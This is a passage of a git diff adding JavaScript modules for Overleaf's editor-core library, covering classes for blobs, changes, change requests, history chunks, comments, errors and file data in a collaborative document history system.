+ * + * @param {Array.<string>} authors author list + * @param {string} msg + */ +function assertV2(authors, msg) { + _.each(authors, function (author) { + check.assert.maybe.match(author, /^[0-9a-f]{24}$/, msg) + }) +} + +module.exports = { assertV1, assertV2 } diff --git a/libraries/overleaf-editor-core/lib/blob.js b/libraries/overleaf-editor-core/lib/blob.js new file mode 100644 index 0000000..7f1b7bb --- /dev/null +++ b/libraries/overleaf-editor-core/lib/blob.js @@ -0,0 +1,109 @@ +'use strict' + +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') + +const TextOperation = require('./operation/text_operation') + +class NotFoundError extends OError { + constructor(hash) { + super(`blob ${hash} not found`, { hash }) + this.hash = hash + } +} + +/** + * Metadata record for the content of a file. + */ +class Blob { + static HEX_HASH_RX_STRING = '^[0-9a-f]{40,40}$' + static HEX_HASH_RX = new RegExp(Blob.HEX_HASH_RX_STRING) + + /** + * Size of the largest file that we'll read to determine whether we can edit it + * or not, in bytes. The final decision on whether a file is editable or not is + * based on the number of characters it contains, but we need to read the file + * in to determine that; so it is useful to have an upper bound on the byte + * length of a file that might be editable. + * + * The reason for the factor of 3 is as follows. We cannot currently edit files + * that contain characters outside of the basic multilingual plane, so we're + * limited to characters that can be represented in a single, two-byte UCS-2 + * code unit. Encoding the largest such value, 0xFFFF (which is not actually + * a valid character), takes three bytes in UTF-8: 0xEF 0xBF 0xBF. A file + * composed entirely of three-byte UTF-8 codepoints is the worst case; in + * practice, this is a very conservative upper bound. + * + * @type {number} + */ + static MAX_EDITABLE_BYTE_LENGTH_BOUND = 3 * TextOperation.MAX_STRING_LENGTH + + static NotFoundError = NotFoundError + + /** + * @param {string} hash + * @param {number} byteLength + * @param {number} [stringLength] + */ + constructor(hash, byteLength, stringLength) { + this.setHash(hash) + this.setByteLength(byteLength) + this.setStringLength(stringLength) + } + + static fromRaw(raw) { + if (raw) { + return new Blob(raw.hash, raw.byteLength, raw.stringLength) + } + return null + } + + toRaw() { + return { + hash: this.hash, + byteLength: this.byteLength, + stringLength: this.stringLength, + } + } + + /** + * Hex hash. + * @return {String} + */ + getHash() { + return this.hash + } + + setHash(hash) { + assert.match(hash, Blob.HEX_HASH_RX, 'bad hash') + this.hash = hash + } + + /** + * Length of the blob in bytes. + * @return {number} + */ + getByteLength() { + return this.byteLength + } + + setByteLength(byteLength) { + assert.integer(byteLength, 'bad byteLength') + this.byteLength = byteLength + } + + /** + * Utf-8 length of the blob content, if it appears to be valid UTF-8. 
+ * @return {number|undefined} + */ + getStringLength() { + return this.stringLength + } + + setStringLength(stringLength) { + assert.maybe.integer(stringLength, 'bad stringLength') + this.stringLength = stringLength + } +} + +module.exports = Blob diff --git a/libraries/overleaf-editor-core/lib/change.js b/libraries/overleaf-editor-core/lib/change.js new file mode 100644 index 0000000..e36cda9 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/change.js @@ -0,0 +1,352 @@ +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert +const pMap = require('p-map') + +const AuthorList = require('./author_list') +const Operation = require('./operation') +const Origin = require('./origin') +const Snapshot = require('./snapshot') +const FileMap = require('./file_map') +const V2DocVersions = require('./v2_doc_versions') + +/** + * @import Author from "./author" + * @import { BlobStore } from "./types" + */ + +/** + * A Change is a list of {@link Operation}s applied atomically by given + * {@link Author}(s) at a given time. + */ +class Change { + static PROJECT_VERSION_RX_STRING = '^[0-9]+\\.[0-9]+$' + static PROJECT_VERSION_RX = new RegExp(Change.PROJECT_VERSION_RX_STRING) + + /** + * @param {Array.<Operation>} operations + * @param {Date} timestamp + * @param {number[] | Author[]} [authors] + * @param {Origin} [origin] + * @param {string[]} [v2Authors] + * @param {string} [projectVersion] + * @param {V2DocVersions} [v2DocVersions] + */ + constructor( + operations, + timestamp, + authors, + origin, + v2Authors, + projectVersion, + v2DocVersions + ) { + this.setOperations(operations) + this.setTimestamp(timestamp) + this.setAuthors(authors || []) + this.setOrigin(origin) + this.setV2Authors(v2Authors || []) + this.setProjectVersion(projectVersion) + this.setV2DocVersions(v2DocVersions) + } + + /** + * For serialization. + * + * @return {Object} + */ + toRaw() { + function toRaw(object) { + return object.toRaw() + } + const raw = { + operations: this.operations.map(toRaw), + timestamp: this.timestamp.toISOString(), + authors: this.authors, + } + if (this.v2Authors) raw.v2Authors = this.v2Authors + if (this.origin) raw.origin = this.origin.toRaw() + if (this.projectVersion) raw.projectVersion = this.projectVersion + if (this.v2DocVersions) raw.v2DocVersions = this.v2DocVersions.toRaw() + return raw + } + + static fromRaw(raw) { + if (!raw) return null + assert.array.of.object(raw.operations, 'bad raw.operations') + assert.nonEmptyString(raw.timestamp, 'bad raw.timestamp') + + // Hack to clean up bad data where author id of some changes was 0, instead of + // null. The root cause of the bug is fixed in + // https://github.com/overleaf/write_latex/pull/3804 but the bad data persists + // on S3 + let authors + if (raw.authors) { + authors = raw.authors.map( + // Null represents an anonymous author + author => (author === 0 ? 
null : author) + ) + } + + return new Change( + raw.operations.map(Operation.fromRaw), + new Date(raw.timestamp), + authors, + raw.origin && Origin.fromRaw(raw.origin), + raw.v2Authors, + raw.projectVersion, + raw.v2DocVersions && V2DocVersions.fromRaw(raw.v2DocVersions) + ) + } + + /** + * @return {Operation[]} + */ + getOperations() { + return this.operations + } + + setOperations(operations) { + assert.array.of.object(operations, 'Change: bad operations') + this.operations = operations + } + + getTimestamp() { + return this.timestamp + } + + setTimestamp(timestamp) { + assert.date(timestamp, 'Change: bad timestamp') + this.timestamp = timestamp + } + + /** + * @return {Array.<number | Author>} zero or more + */ + getAuthors() { + return this.authors + } + + setAuthors(authors) { + assert.array(authors, 'Change: bad author ids array') + if (authors.length > 1) { + assert.maybe.emptyArray( + this.v2Authors, + 'Change: cannot set v1 authors if v2 authors is set' + ) + } + AuthorList.assertV1(authors, 'Change: bad author ids') + + this.authors = authors + } + + /** + * @return {Array.<string>} zero or more + */ + getV2Authors() { + return this.v2Authors + } + + setV2Authors(v2Authors) { + assert.array(v2Authors, 'Change: bad v2 author ids array') + if (v2Authors.length > 1) { + assert.maybe.emptyArray( + this.authors, + 'Change: cannot set v2 authors if v1 authors is set' + ) + } + AuthorList.assertV2(v2Authors, 'Change: not a v2 author id') + this.v2Authors = v2Authors + } + + /** + * @return {Origin | null | undefined} + */ + getOrigin() { + return this.origin + } + + setOrigin(origin) { + assert.maybe.instance(origin, Origin, 'Change: bad origin') + this.origin = origin + } + + /** + * @return {string | null | undefined} + */ + getProjectVersion() { + return this.projectVersion + } + + setProjectVersion(projectVersion) { + assert.maybe.match( + projectVersion, + Change.PROJECT_VERSION_RX, + 'Change: bad projectVersion' + ) + this.projectVersion = projectVersion + } + + /** + * @return {V2DocVersions | null | undefined} + */ + getV2DocVersions() { + return this.v2DocVersions + } + + setV2DocVersions(v2DocVersions) { + assert.maybe.instance( + v2DocVersions, + V2DocVersions, + 'Change: bad v2DocVersions' + ) + this.v2DocVersions = v2DocVersions + } + + /** + * If this Change references blob hashes, add them to the given set. + * + * @param {Set.<String>} blobHashes + */ + findBlobHashes(blobHashes) { + for (const operation of this.operations) { + operation.findBlobHashes(blobHashes) + } + } + + /** + * If this Change contains any File objects, load them. + * + * @param {string} kind see {File#load} + * @param {BlobStore} blobStore + * @return {Promise} + */ + async loadFiles(kind, blobStore) { + for (const operation of this.operations) { + await operation.loadFiles(kind, blobStore) + } + } + + /** + * Append an operation to the end of the operations list. + * + * @param {Operation} operation + * @return {this} + */ + pushOperation(operation) { + this.getOperations().push(operation) + return this + } + + /** + * Apply this change to a snapshot. All operations are applied, and then the + * snapshot version is increased. 
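+ * + * (Illustrative only: change.applyTo(snapshot) drains the + * iterativelyApplyTo generator below purely for its side effects on the + * snapshot; callers that want per-operation progress can consume the + * generator directly.)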
+ * + * Recoverable errors (caused by historical bad data) are ignored unless + * opts.strict is true + * + * @param {Snapshot} snapshot modified in place + * @param {object} opts + * @param {boolean} [opts.strict] - Do not ignore recoverable errors + */ + applyTo(snapshot, opts = {}) { + // eslint-disable-next-line no-unused-vars + for (const operation of this.iterativelyApplyTo(snapshot, opts)) { + // Nothing to do: we're just consuming the iterator for the side effects + } + } + + /** + * Generator that applies this change to a snapshot and yields each + * operation after it has been applied. + * + * Recoverable errors (caused by historical bad data) are ignored unless + * opts.strict is true + * + * @param {Snapshot} snapshot modified in place + * @param {object} opts + * @param {boolean} [opts.strict] - Do not ignore recoverable errors + */ + *iterativelyApplyTo(snapshot, opts = {}) { + assert.object(snapshot, 'bad snapshot') + + for (const operation of this.operations) { + try { + operation.applyTo(snapshot, opts) + } catch (err) { + const recoverable = + err instanceof Snapshot.EditMissingFileError || + err instanceof FileMap.FileNotFoundError + if (!recoverable || opts.strict) { + throw err + } + } + yield operation + } + + // update project version if present in change + if (this.projectVersion) { + snapshot.setProjectVersion(this.projectVersion) + } + + // update doc versions + if (this.v2DocVersions) { + snapshot.updateV2DocVersions(this.v2DocVersions) + } + } + + /** + * Transform this change to account for the fact that the other change occurred + * simultaneously and was applied first. + * + * This change is modified in place (by transforming its operations). + * + * @param {Change} other + */ + transformAfter(other) { + assert.object(other, 'bad other') + + const thisOperations = this.getOperations() + const otherOperations = other.getOperations() + for (let i = 0; i < otherOperations.length; ++i) { + for (let j = 0; j < thisOperations.length; ++j) { + thisOperations[j] = Operation.transform( + thisOperations[j], + otherOperations[i] + )[0] + } + } + } + + clone() { + return Change.fromRaw(this.toRaw()) + } + + async store(blobStore, concurrency) { + assert.maybe.number(concurrency, 'bad concurrency') + + const raw = this.toRaw() + raw.authors = _.uniq(raw.authors) + + const rawOperations = await pMap( + this.operations, + operation => operation.store(blobStore), + { concurrency: concurrency || 1 } + ) + raw.operations = rawOperations + return raw + } + + canBeComposedWith(other) { + const operations = this.getOperations() + const otherOperations = other.getOperations() + + // We ignore complex changes with more than 1 operation + if (operations.length > 1 || otherOperations.length > 1) return false + + return operations[0].canBeComposedWith(otherOperations[0]) + } +} + +module.exports = Change diff --git a/libraries/overleaf-editor-core/lib/change_note.js b/libraries/overleaf-editor-core/lib/change_note.js new file mode 100644 index 0000000..3704295 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/change_note.js @@ -0,0 +1,61 @@ +'use strict' + +const assert = require('check-types').assert + +const Change = require('./change') + +/** + * A `ChangeNote` is returned when the server has applied a {@link Change}. 
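+ *
+ * A round-trip sketch with hypothetical values; `rawChange` stands in for a
+ * valid raw change object:
+ *
+ * @example
+ * const note = ChangeNote.fromRaw({ baseVersion: 41, change: rawChange })
+ * note.getBaseVersion() // => 41
+ * note.getResultVersion() // => 42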
+ */
+class ChangeNote {
+ /**
+ * @param {number} baseVersion the new base version for the change
+ * @param {Change} [change]
+ */
+ constructor(baseVersion, change) {
+ assert.integer(baseVersion, 'bad baseVersion')
+ assert.maybe.instance(change, Change, 'bad change')
+
+ this.baseVersion = baseVersion
+ this.change = change
+ }
+
+ /**
+ * For serialization.
+ *
+ * @return {Object}
+ */
+ toRaw() {
+ return {
+ baseVersion: this.baseVersion,
+ change: this.change.toRaw(),
+ }
+ }
+
+ toRawWithoutChange() {
+ return {
+ baseVersion: this.baseVersion,
+ }
+ }
+
+ static fromRaw(raw) {
+ assert.integer(raw.baseVersion, 'bad raw.baseVersion')
+ assert.maybe.object(raw.change, 'bad raw.change')
+
+ return new ChangeNote(raw.baseVersion, Change.fromRaw(raw.change))
+ }
+
+ getBaseVersion() {
+ return this.baseVersion
+ }
+
+ getResultVersion() {
+ return this.baseVersion + 1
+ }
+
+ getChange() {
+ return this.change
+ }
+}
+
+module.exports = ChangeNote
diff --git a/libraries/overleaf-editor-core/lib/change_request.js b/libraries/overleaf-editor-core/lib/change_request.js
new file mode 100644
index 0000000..a5cbb2e
--- /dev/null
+++ b/libraries/overleaf-editor-core/lib/change_request.js
@@ -0,0 +1,90 @@
+'use strict'
+
+const assert = require('check-types').assert
+
+const AuthorList = require('./author_list')
+const Change = require('./change')
+const Operation = require('./operation')
+
+/**
+ * @import Author from "./author"
+ */
+
+/**
+ * A `ChangeRequest` is a list of {@link Operation}s that the server can apply
+ * as a {@link Change}.
+ *
+ * If the change is marked as `untransformable`, then the server will not
+ * attempt to transform it if it is out of date (i.e. if the baseVersion no
+ * longer matches the project's latest version). For example, if the client
+ * needs to ensure that a metadata property is set on exactly one file, it can't
+ * do that reliably if there's a chance that other clients will also change the
+ * metadata at the same time. The expectation is that if the change is rejected,
+ * the client will retry on a later version.
+ */
+class ChangeRequest {
+ /**
+ * @param {number} baseVersion
+ * @param {Array.<Operation>} operations
+ * @param {boolean} [untransformable]
+ * @param {number[] | Author[]} [authors]
+ */
+ constructor(baseVersion, operations, untransformable, authors) {
+ assert.integer(baseVersion, 'bad baseVersion')
+ assert.array.of.object(operations, 'bad operations')
+ assert.maybe.boolean(untransformable, 'ChangeRequest: bad untransformable')
+ // TODO remove authors once we have JWTs working --- pass as parameter to
+ // makeChange instead
+ authors = authors || []
+
+ // check all are the same type
+ AuthorList.assertV1(authors, 'bad authors')
+
+ this.authors = authors
+ this.baseVersion = baseVersion
+ this.operations = operations
+ this.untransformable = untransformable || false
+ }
+
+ /**
+ * For serialization.
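+ *
+ * The raw shape is roughly (illustrative values only):
+ * { baseVersion: 5, operations: [...], untransformable: false, authors: [] }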
+ * + * @return {Object} + */ + toRaw() { + function operationToRaw(operation) { + return operation.toRaw() + } + + return { + baseVersion: this.baseVersion, + operations: this.operations.map(operationToRaw), + untransformable: this.untransformable, + authors: this.authors, + } + } + + static fromRaw(raw) { + assert.array.of.object(raw.operations, 'bad raw.operations') + return new ChangeRequest( + raw.baseVersion, + raw.operations.map(Operation.fromRaw), + raw.untransformable, + raw.authors + ) + } + + getBaseVersion() { + return this.baseVersion + } + + isUntransformable() { + return this.untransformable + } + + makeChange(timestamp) { + return new Change(this.operations, timestamp, this.authors) + } +} + +module.exports = ChangeRequest diff --git a/libraries/overleaf-editor-core/lib/chunk.js b/libraries/overleaf-editor-core/lib/chunk.js new file mode 100644 index 0000000..929ecb0 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/chunk.js @@ -0,0 +1,172 @@ +'use strict' + +const assert = require('check-types').assert +const OError = require('@overleaf/o-error') + +const History = require('./history') + +/** + * @import { BlobStore, RawChunk } from "./types" + * @import Change from "./change" + * @import Snapshot from "./snapshot" + */ + +class ConflictingEndVersion extends OError { + constructor(clientEndVersion, latestEndVersion) { + const message = + 'client sent updates with end_version ' + + clientEndVersion + + ' but latest chunk has end_version ' + + latestEndVersion + super(message, { clientEndVersion, latestEndVersion }) + this.clientEndVersion = clientEndVersion + this.latestEndVersion = latestEndVersion + } +} + +class NotFoundError extends OError { + // `message` and `info` optional arguments allow children classes to override + // these values, ensuring backwards compatibility with previous implementation + // based on the `overleaf-error-type` library + constructor(projectId, message, info) { + const errorMessage = message || `no chunks for project ${projectId}` + const errorInfo = info || { projectId } + super(errorMessage, errorInfo) + this.projectId = projectId + } +} + +class VersionNotFoundError extends NotFoundError { + constructor(projectId, version) { + super(projectId, `chunk for ${projectId} v ${version} not found`, { + projectId, + version, + }) + this.projectId = projectId + this.version = version + } +} + +class BeforeTimestampNotFoundError extends NotFoundError { + constructor(projectId, timestamp) { + super(projectId, `chunk for ${projectId} timestamp ${timestamp} not found`) + this.projectId = projectId + this.timestamp = timestamp + } +} + +class NotPersistedError extends NotFoundError { + constructor(projectId) { + super(projectId, `chunk for ${projectId} not persisted yet`) + this.projectId = projectId + } +} + +/** + * A Chunk is a {@link History} that is part of a project's overall history. It + * has a start and an end version that place its History in context. 
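+ *
+ * For instance (hypothetical numbers): a chunk with start version 20 whose
+ * history holds 10 changes covers project versions 20 (before any of its
+ * changes) through 30 (after all of them):
+ *
+ * @example
+ * const chunk = new Chunk(history, 20) // `history` is assumed to exist
+ * chunk.getStartVersion() // => 20
+ * chunk.getEndVersion() // => 30 (start version plus number of changes)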
+ */
+class Chunk {
+ static ConflictingEndVersion = ConflictingEndVersion
+ static NotFoundError = NotFoundError
+ static VersionNotFoundError = VersionNotFoundError
+ static BeforeTimestampNotFoundError = BeforeTimestampNotFoundError
+ static NotPersistedError = NotPersistedError
+
+ /**
+ * @param {History} history
+ * @param {number} startVersion
+ */
+ constructor(history, startVersion) {
+ assert.instance(history, History, 'bad history')
+ assert.integer(startVersion, 'bad startVersion')
+
+ this.history = history
+ this.startVersion = startVersion
+ }
+
+ /**
+ * @param {RawChunk} raw
+ * @return {Chunk}
+ */
+ static fromRaw(raw) {
+ return new Chunk(History.fromRaw(raw.history), raw.startVersion)
+ }
+
+ toRaw() {
+ return { history: this.history.toRaw(), startVersion: this.startVersion }
+ }
+
+ /**
+ * The history for this chunk.
+ *
+ * @return {History}
+ */
+ getHistory() {
+ return this.history
+ }
+
+ /**
+ * {@see History#getSnapshot}
+ * @return {Snapshot}
+ */
+ getSnapshot() {
+ return this.history.getSnapshot()
+ }
+
+ /**
+ * {@see History#getChanges}
+ * @return {Array.<Change>}
+ */
+ getChanges() {
+ return this.history.getChanges()
+ }
+
+ /**
+ * {@see History#pushChanges}
+ * @param {Array.<Change>} changes
+ */
+ pushChanges(changes) {
+ this.history.pushChanges(changes)
+ }
+
+ /**
+ * The version of the project after applying all changes in this chunk.
+ *
+ * @return {number} non-negative, greater than or equal to start version
+ */
+ getEndVersion() {
+ return this.startVersion + this.history.countChanges()
+ }
+
+ /**
+ * The timestamp of the last change in this chunk.
+ */
+ getEndTimestamp() {
+ if (!this.history.countChanges()) return null
+ return this.history.getChanges().slice(-1)[0].getTimestamp()
+ }
+
+ /**
+ * The version of the project before applying all changes in this chunk.
+ *
+ * @return {number} non-negative, less than or equal to end version
+ */
+ getStartVersion() {
+ return this.startVersion
+ }
+
+ /**
+ * {@see History#loadFiles}
+ *
+ * @param {string} kind
+ * @param {BlobStore} blobStore
+ * @return {Promise}
+ */
+ async loadFiles(kind, blobStore) {
+ await this.history.loadFiles(kind, blobStore)
+ }
+}
+
+module.exports = Chunk
diff --git a/libraries/overleaf-editor-core/lib/chunk_response.js b/libraries/overleaf-editor-core/lib/chunk_response.js
new file mode 100644
index 0000000..454d0de
--- /dev/null
+++ b/libraries/overleaf-editor-core/lib/chunk_response.js
@@ -0,0 +1,33 @@
+'use strict'
+
+const assert = require('check-types').assert
+const Chunk = require('./chunk')
+
+/**
+ * The ChunkResponse allows for additional data to be sent back with the
+ * chunk; at present there is no extra data to send.
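+ *
+ * A round-trip sketch; `rawChunk` stands in for a valid raw chunk:
+ *
+ * @example
+ * const response = ChunkResponse.fromRaw({ chunk: rawChunk })
+ * response.getChunk() // => a Chunk instance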
+ */ +class ChunkResponse { + constructor(chunk) { + assert.instance(chunk, Chunk) + this.chunk = chunk + } + + toRaw() { + return { + chunk: this.chunk.toRaw(), + } + } + + static fromRaw(raw) { + if (!raw) return null + + return new ChunkResponse(Chunk.fromRaw(raw.chunk)) + } + + getChunk() { + return this.chunk + } +} + +module.exports = ChunkResponse diff --git a/libraries/overleaf-editor-core/lib/comment.js b/libraries/overleaf-editor-core/lib/comment.js new file mode 100644 index 0000000..89a56dd --- /dev/null +++ b/libraries/overleaf-editor-core/lib/comment.js @@ -0,0 +1,206 @@ +// @ts-check +const { RetainOp, InsertOp, RemoveOp } = require('./operation/scan_op') +const Range = require('./range') + +/** + * @import { CommentRawData } from "./types" + * @import TextOperation from "./operation/text_operation" + */ + +class Comment { + /** + * @readonly + * @type {ReadonlyArray} + */ + ranges = [] + + /** + * @readonly + * @type {boolean} + */ + resolved = false + + /** + * @param {string} id + * @param {ReadonlyArray} ranges + * @param {boolean} [resolved] + */ + constructor(id, ranges, resolved = false) { + this.id = id + this.resolved = resolved + this.ranges = this.mergeRanges(ranges) + } + + /** + * + * @param {number} cursor + * @param {number} length + * @param {boolean} [extendComment] + * @returns {Comment} + */ + applyInsert(cursor, length, extendComment = false) { + let existingRangeExtended = false + const newRanges = [] + + for (const commentRange of this.ranges) { + if (cursor === commentRange.end) { + // insert right after the comment + if (extendComment) { + newRanges.push(commentRange.extendBy(length)) + existingRangeExtended = true + } else { + newRanges.push(commentRange) + } + } else if (cursor === commentRange.start) { + // insert at the start of the comment + if (extendComment) { + newRanges.push(commentRange.extendBy(length)) + existingRangeExtended = true + } else { + newRanges.push(commentRange.moveBy(length)) + } + } else if (commentRange.startIsAfter(cursor)) { + // insert before the comment + newRanges.push(commentRange.moveBy(length)) + } else if (commentRange.containsCursor(cursor)) { + // insert is inside the comment + if (extendComment) { + newRanges.push(commentRange.extendBy(length)) + existingRangeExtended = true + } else { + const [rangeUpToCursor, , rangeAfterCursor] = commentRange.insertAt( + cursor, + length + ) + + // use current commentRange for the part before the cursor + newRanges.push(new Range(commentRange.pos, rangeUpToCursor.length)) + // add the part after the cursor as a new range + newRanges.push(rangeAfterCursor) + } + } else { + // insert is after the comment + newRanges.push(commentRange) + } + } + + // if the insert is not inside any range, add a new range + if (extendComment && !existingRangeExtended) { + newRanges.push(new Range(cursor, length)) + } + + return new Comment(this.id, newRanges, this.resolved) + } + + /** + * + * @param {Range} deletedRange + * @returns {Comment} + */ + applyDelete(deletedRange) { + const newRanges = [] + + for (const commentRange of this.ranges) { + if (commentRange.overlaps(deletedRange)) { + newRanges.push(commentRange.subtract(deletedRange)) + } else if (commentRange.startsAfter(deletedRange)) { + newRanges.push(commentRange.moveBy(-deletedRange.length)) + } else { + newRanges.push(commentRange) + } + } + + return new Comment(this.id, newRanges, this.resolved) + } + + /** + * + * @param {TextOperation} operation + * @param {string} commentId + * @returns {Comment} + */ + 
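+ // An illustrative sketch of the range arithmetic above (hypothetical
+ // values; raw ranges shown as { pos, length }): a comment covering
+ // [5, 10) sees 3 characters inserted at position 2 and moves, unchanged
+ // in length, to [8, 13):
+ //
+ // new Comment('c1', [new Range(5, 5)]).applyInsert(2, 3)
+ // // => ranges [{ pos: 8, length: 5 }]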
applyTextOperation(operation, commentId) { + /** @type {Comment} */ + let comment = this + let cursor = 0 + for (const op of operation.ops) { + if (op instanceof RetainOp) { + cursor += op.length + } else if (op instanceof InsertOp) { + comment = comment.applyInsert( + cursor, + op.insertion.length, + op.commentIds?.includes(commentId) + ) + cursor += op.insertion.length + } else if (op instanceof RemoveOp) { + comment = comment.applyDelete(new Range(cursor, op.length)) + } + } + return comment + } + + isEmpty() { + return this.ranges.length === 0 + } + + /** + * + * @returns {CommentRawData} + */ + toRaw() { + /** @type CommentRawData */ + const raw = { + id: this.id, + ranges: this.ranges.map(range => range.toRaw()), + } + if (this.resolved) { + raw.resolved = true + } + return raw + } + + /** + * @param {ReadonlyArray} ranges + * @returns {ReadonlyArray} + */ + mergeRanges(ranges) { + /** @type {Range[]} */ + const mergedRanges = [] + + const sortedRanges = [...ranges].sort((a, b) => a.start - b.start) + for (const range of sortedRanges) { + if (range.isEmpty()) { + continue + } + const lastMerged = mergedRanges[mergedRanges.length - 1] + if (lastMerged?.overlaps(range)) { + throw new Error('Ranges cannot overlap') + } + if (range.isEmpty()) { + throw new Error('Comment range cannot be empty') + } + if (lastMerged?.canMerge(range)) { + mergedRanges[mergedRanges.length - 1] = lastMerged.merge(range) + } else { + mergedRanges.push(range) + } + } + + return mergedRanges + } + + /** + * @param {CommentRawData} rawComment + * @returns {Comment} + */ + static fromRaw(rawComment) { + return new Comment( + rawComment.id, + rawComment.ranges.map(range => Range.fromRaw(range)), + rawComment.resolved + ) + } +} + +module.exports = Comment diff --git a/libraries/overleaf-editor-core/lib/errors.js b/libraries/overleaf-editor-core/lib/errors.js new file mode 100644 index 0000000..b384cc1 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/errors.js @@ -0,0 +1,34 @@ +const OError = require('@overleaf/o-error') + +class UnprocessableError extends OError {} + +class ApplyError extends UnprocessableError { + constructor(message, operation, operand) { + super(message) + this.operation = operation + this.operand = operand + } +} + +class InvalidInsertionError extends UnprocessableError { + constructor(str, operation) { + super('inserted text contains non BMP characters') + this.str = str + this.operation = operation + } +} + +class TooLongError extends UnprocessableError { + constructor(operation, resultLength) { + super('resulting string would be too long', { resultLength }) + this.operation = operation + this.resultLength = resultLength + } +} + +module.exports = { + UnprocessableError, + ApplyError, + InvalidInsertionError, + TooLongError, +} diff --git a/libraries/overleaf-editor-core/lib/file.js b/libraries/overleaf-editor-core/lib/file.js new file mode 100644 index 0000000..b5321c3 --- /dev/null +++ b/libraries/overleaf-editor-core/lib/file.js @@ -0,0 +1,280 @@ +// @ts-check +'use strict' + +const _ = require('lodash') +const assert = require('check-types').assert + +const OError = require('@overleaf/o-error') +const FileData = require('./file_data') +const HashFileData = require('./file_data/hash_file_data') +const StringFileData = require('./file_data/string_file_data') + +/** + * @import Blob from "./blob" + * @import { BlobStore, ReadonlyBlobStore, RawFileData, RawFile } from "./types" + * @import { StringFileRawData, CommentRawData } from "./types" + * @import CommentList from 
"./file_data/comment_list" + * @import TextOperation from "./operation/text_operation" + * @import TrackedChangeList from "./file_data/tracked_change_list" + * + * @typedef {{filterTrackedDeletes?: boolean}} FileGetContentOptions + */ + +class NotEditableError extends OError { + constructor() { + super('File is not editable') + } +} + +/** + * A file in a {@link Snapshot}. A file has both data and metadata. There + * are several classes of data that represent the various types of file + * data that are supported, namely text and binary, and also the various + * states that a file's data can be in, namely: + * + * 1. Hash only: all we know is the file's hash; this is how we encode file + * content in long term storage. + * 2. Lazily loaded: the hash of the file, its length, and its type are known, + * but its content is not loaded. Operations are cached for application + * later. + * 3. Eagerly loaded: the content of a text file is fully loaded into memory + * as a string. + * 4. Hollow: only the byte and/or UTF-8 length of the file are known; this is + * used to allow for validation of operations when editing collaboratively + * without having to keep file data in memory on the server. + */ +class File { + /** + * Blob hash for an empty file. + * + * @type {String} + */ + static EMPTY_FILE_HASH = 'e69de29bb2d1d6434b8b29ae775ad8c2e48c5391' + + static NotEditableError = NotEditableError + + /** + * @param {FileData} data + * @param {Object} [metadata] + */ + constructor(data, metadata) { + assert.instance(data, FileData, 'File: bad data') + + this.data = data + this.metadata = {} + this.setMetadata(metadata || {}) + } + + /** + * @param {RawFile} raw + * @return {File|null} + */ + static fromRaw(raw) { + if (!raw) return null + return new File(FileData.fromRaw(raw), raw.metadata) + } + + /** + * @param {string} hash + * @param {string} [rangesHash] + * @param {Object} [metadata] + * @return {File} + */ + static fromHash(hash, rangesHash, metadata) { + return new File(new HashFileData(hash, rangesHash), metadata) + } + + /** + * @param {string} string + * @param {Object} [metadata] + * @return {File} + */ + static fromString(string, metadata) { + return new File(new StringFileData(string), metadata) + } + + /** + * @param {number} byteLength + * @param {number} [stringLength] + * @param {Object} [metadata] + * @return {File} + */ + static createHollow(byteLength, stringLength, metadata) { + return new File(FileData.createHollow(byteLength, stringLength), metadata) + } + + /** + * @param {Blob} blob + * @param {Blob} [rangesBlob] + * @param {Object} [metadata] + * @return {File} + */ + static createLazyFromBlobs(blob, rangesBlob, metadata) { + return new File(FileData.createLazyFromBlobs(blob, rangesBlob), metadata) + } + + /** + * @returns {RawFile} + */ + toRaw() { + /** @type RawFile */ + const rawFileData = this.data.toRaw() + storeRawMetadata(this.metadata, rawFileData) + return rawFileData + } + + /** + * Hexadecimal SHA-1 hash of the file's content, if known. + * + * @return {string | null | undefined} + */ + getHash() { + return this.data.getHash() + } + + /** + * Hexadecimal SHA-1 hash of the ranges content (comments + tracked changes), + * if known. + * + * @return {string | null | undefined} + */ + getRangesHash() { + return this.data.getRangesHash() + } + + /** + * The content of the file, if it is known and if this file has UTF-8 encoded + * content. 
+ * + * @param {FileGetContentOptions} [opts] + * @return {string | null | undefined} + */ + getContent(opts = {}) { + return this.data.getContent(opts) + } + + /** + * Whether this file has string content and is small enough to be edited using + * {@link TextOperation}s. + * + * @return {boolean | null | undefined} null if it is not currently known + */ + isEditable() { + return this.data.isEditable() + } + + /** + * The length of the file's content in bytes, if known. + * + * @return {number | null | undefined} + */ + getByteLength() { + return this.data.getByteLength() + } + + /** + * The length of the file's content in characters, if known. + * + * @return {number | null | undefined} + */ + getStringLength() { + return this.data.getStringLength() + } + + /** + * Return the metadata object for this file. + * + * @return {Object} + */ + getMetadata() { + return this.metadata + } + + /** + * Set the metadata object for this file. + * + * @param {Object} metadata + */ + setMetadata(metadata) { + assert.object(metadata, 'File: bad metadata') + this.metadata = metadata + } + + /** + * Edit this file, if possible. + * + * @param {TextOperation} textOperation + */ + edit(textOperation) { + if (!this.data.isEditable()) throw new File.NotEditableError() + this.data.edit(textOperation) + } + + /** + * Get the comments for this file. + * + * @return {CommentList} + */ + getComments() { + return this.data.getComments() + } + + /** + * Get the tracked changes for this file. + * @return {TrackedChangeList} + */ + getTrackedChanges() { + return this.data.getTrackedChanges() + } + + /** + * Clone a file. + * + * @return {File} a new object of the same type + */ + clone() { + return /** @type {File} */ (File.fromRaw(this.toRaw())) + } + + /** + * Convert this file's data to the given kind. This may require us to load file + * size or content from the given blob store, so this is an asynchronous + * operation. + * + * @param {string} kind + * @param {ReadonlyBlobStore} blobStore + * @return {Promise.} for this + */ + async load(kind, blobStore) { + const data = await this.data.load(kind, blobStore) + this.data = data + return this + } + + /** + * Store the file's content in the blob store and return a raw file with + * the corresponding hash. As a side effect, make this object consistent with + * the hash. 
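+ *
+ * A sketch, assuming `blobStore` implements the BlobStore interface:
+ *
+ * @example
+ * const raw = await file.store(blobStore)
+ * // => { hash: '...' } (an empty file would yield File.EMPTY_FILE_HASH)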
